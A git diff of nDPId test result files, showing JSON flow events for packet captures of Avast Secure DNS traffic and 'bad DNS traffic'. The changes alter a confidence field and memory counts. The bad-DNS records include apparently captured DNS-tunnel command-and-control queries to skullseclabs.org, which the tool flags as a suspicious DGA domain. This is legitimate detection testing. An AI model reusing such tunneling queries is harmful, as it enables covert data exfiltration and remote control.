00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1625558735164,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625558735164,"pkt":"YDjgxTWgeJS0JASgCABFAADM7yMAADIR\/IW11iOVwKgCZAG7wAAAuFhlVKuBgAABAAEAAAAAATIJc0VjVVJFZE5TBUFWQVN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558735043,"flow_last_seen":1625558735164,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556067432,"flow_last_seen":1625556067553,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556100118,"flow_last_seen":1625556100236,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556102196,"flow_last_seen":1625556102314,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558730271,"flow_last_seen":1625558730389,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558735043,"flow_last_seen":1625558735164,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556067432,"flow_last_seen":1625556067553,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556100118,"flow_last_seen":1625556100236,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556102196,"flow_last_seen":1625556102314,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558730271,"flow_last_seen":1625558730389,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":8209,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":39,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":39,"total-idle-flows":39,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":209,"global_ts_msec":1625558735164} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 77/77 @@ -215,9 +215,9 @@ ~~ total active/idle flows...: 39/39 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5911956 bytes -~~ total memory freed........: 5911956 bytes -~~ total allocations/frees...: 118343/118343 +~~ total memory allocated....: 6045590 bytes +~~ total memory freed........: 6045590 bytes +~~ total allocations/frees...: 121105/121105 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 702 chars 
diff --git a/test/results/bad-dns-traffic.pcap.out b/test/results/bad-dns-traffic.pcap.out index e2bac629b..fa4ca26e2 100644 --- a/test/results/bad-dns-traffic.pcap.out +++ b/test/results/bad-dns-traffic.pcap.out 
@@ -2,30 +2,30 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1486012623234} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1486012623234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012623234,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3821AAEARVP\/AqCtbBAICBIx+ADUAYyoIa68BAAABAAAAAAAAODA1ZTEwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} 
-00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"05e100a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"05e100a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1486012624242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012624242,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB38+5AAEARVH7AqCtbBAICBIx+ADUAY73N0g0BAAABAAAAAAAAODk1ODcwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012623234,"flow_last_seen":1486012624242,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012624242,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012623234,"flow_last_seen":1486012624242,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012624242,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1486012624325,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1486012624325,"pkt":"5LMYS\/DDAhoR+f4qCABFAACaAABAADMRVUoEAgIEwKgrWwA1jH4AhhPK0g2BgAABAAEAAAAAODk1ODcwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAcAMAA8AAQAAADwAFwAKEjYzNGYwMGE2MjEwMTBhMDAwMMBF"} 
-01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012623234,"flow_last_seen":1486012624325,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1486012624325,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} +01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012623234,"flow_last_seen":1486012624325,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1486012624325,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1486012635073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012635073,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3+zhAAEARTTTAqCtbBAICBNwiADUAYwrvCk0BAAABAAAAAAAAODI0NDMwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": 
{"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"244300fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"244300fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1486012636079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012636079,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3+7NAAEARTLnAqCtbBAICBNwiADUAY1S7n3sBAAABAAAAAAAAODZiNTAwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAAUAAQ=="} 
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012635073,"flow_last_seen":1486012636079,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012636079,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"6b5000fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012635073,"flow_last_seen":1486012636079,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012636079,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"6b5000fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1486012637085,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012637085,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3\/ElAAEARTCPAqCtbBAICBNwiADUAY0RMqrgBAAABAAAAAAAAOGUxOGYwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAAUAAQ=="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012635073,"flow_last_seen":1486012637085,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":273,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012637085,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e18f00fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
